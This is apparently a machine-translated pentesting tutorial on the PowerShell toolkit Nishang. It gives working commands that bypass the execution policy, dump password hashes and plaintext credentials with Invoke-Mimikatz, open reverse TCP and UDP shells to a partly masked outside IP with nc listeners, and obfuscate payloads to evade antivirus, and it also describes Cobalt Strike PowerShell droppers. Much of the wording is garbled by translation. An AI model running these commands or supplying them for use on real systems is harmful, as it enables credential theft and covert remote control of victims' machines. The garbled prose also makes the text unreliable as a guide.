Initial PowerShell, first let’s understand the concept: PowerShell can be regarded as an upgraded version of cmd (bat scripting language), which is a scripting language on the Windows platform. It is object-oriented and closely related to .Net FrameWork. It can also be thought of as the bash shell on Windows. Windows PowerShell is a command-line shell and scripting environment that enables command-line users and scripters to take advantage of the power of the .NET Framework. It introduces many very useful new concepts that further expand the knowledge you gain and the scripts you create in the Windows Command Prompt and Windows Host environments. The code runs in memory without touching the disk. Many security products cannot detect the activities of PowerShell. cmd.exe is usually blocked from running, but PowerShell does not. In fact, we need to bypass some protective software during the penetration testing process. In addition to bypassing scripts or other tools, the PoweShell tool is also a good choice. For example, we use the password to capture the magical mimikatz on the target host. This magical tool written by a French expert is more commonly used by everyone. The most amazing one is that you can directly obtain the clear text password of the active Windows account from lsass.exe. . But if you don't do a good job of avoiding killing, you will be directly passed by a certain killing-free family bucket. Using Powershell, an attacker can execute commands without touching the disk. Here are some commonly used tools:
Nishang is a special tool for penetration testing based on PowerShell. It integrates scripts and various payloads, such as grabbing passwords, Port scanning, privilege escalation, etc. This tool is used frequently by novices in daily penetration testing. First we need to download this tool. The download address is: https://github.com/samratashok/nishang. After the download is complete, we can see what the following tools include
Below we use a specific experimental environment to demonstrate the commonly used modules in the penetration testing process. Before the demonstration, we need to explain several comparisons encountered when running the powershell tool. Common errors, such as permission issues for executing scripts, issues with importing modules, etc.
Powershell is not allowed when importing the module for the first time, because the default policy is not allowed. At this time, we need to change the execution policy to allow it, which is called remotesigned.
Let’s check what the current execution policy is. Restricted is not allowed to execute any scripts, even if you have administrator rights. We need to modify the permissions and execute the command:
Set-ExecutionPolicy remotesigned. When we query the current execution policy again, remotesigned is allowed. The script will be imported successfully again. Ignore the warning prompts that appear.
Execute to view the script information in the imported module: Get-Command -Module nishang
List the information of this machine: Get-Information
Now we have also modified the execution permission, let’s start our demonstration journey.
When we get a server, we need to know whether the target host is a physical machine or a virtual machine, execute the command: Check -VM
First of all, nishang also integrates a script to capture passwords. First capture the hash value:
#Get-PassHashes / /Simple and direct capture and display in dos interface;
#powershell –exec bypass –Command "& {Import-Module 'C:nishangGatherGet-PassHashes.ps1';Get-PassHashes -PSObjectFormat | Out- File hash.txt}" //Get the hash value and save it in a custom document.
Since we can capture the hash value, we can also capture the plaintext password. Let's first look at the script to capture the password. We can see that the tool Mimikatz is also used, but it is just loaded into the Powershell script.
We can use the following command to get the clear text password:
#powershell –exec bypass –Command "& {Import-Module 'C:nishangGatherInvoke-Mimikatz.ps1';Invoke-Mimikatz}" attempts to directly grab the clear text password of the current system user. (The most commonly used command)
During the penetration test, when we were doing port forwarding, we encountered a series of killings of FamilyMart buckets, nc\lcx\sockes agents, etc. were killed and intercepted from time to time. Then at this time we can use the port forwarding script in nishang. In addition to introducing the built-in port forwarding, here we also experiment with port forwarding with MSF, both of which require a public network server.
1. TCP port forwarding (reverse connection)
Execute the listening command on the public network server: nc -lvp 5555
The target host executes the port forwarding command: Invoke-PowerShellTcp -Reverse -IPAddress 106.xxx.xxx.115 -Port 5555
In this way, after we execute the commands on the target host and the public network respectively, the public network server will rebound a shell, so that we can execute the intranet Server commands.
2. UDP port forwarding (reverse connection)
Execute the monitoring command on the public network server: nc -lup 6666
The target host executes the port forwarding command: Invoke-PowerShellUdp -Reverse -IPAddress 106.xxx.xxx.115 -Port 6666
Which parts of the payload need to be obfuscated, we must specify them in advance, which can be done through the following command:
Set scriptblock 'payload';
We choose to obfuse the entire command as a string (the specific choice is based on the specific penetration testing environment):
Select 1 for ASCII obfuscation, we enter out 1.ps1 to view the output. This command is also equivalent to saving the obfuscated file in the current directory and 1.ps1:
in the target Execute this script on the host. The public network server listens to port 9999, and can also successfully rebound the shell of the intranet host:
Cobalt Strike is a GUI framework penetration testing tool based on Metasploit, which integrates port forwarding, service scanning, automated overflow, and multi-mode port monitoring. exe, powershell Trojan generation, etc. This tool is also a powerful tool for intranet penetration. We are just talking about what kind of sparks can powershell and Cobalt Strike touch?
Cobalt Strike needs to be installed on the client and server respectively, and then start this tool:
First we listen to a port, write the public IP address as the host address, then generate a powershell command, run this command on the target host, the target host will come online, and then we can remotely capture passwords and escalate privileges , monitoring and other operations:
The above is the detailed content of How to use Nishang, the PowerShell penetration testing tool. For more information, please follow other related articles on the PHP Chinese website!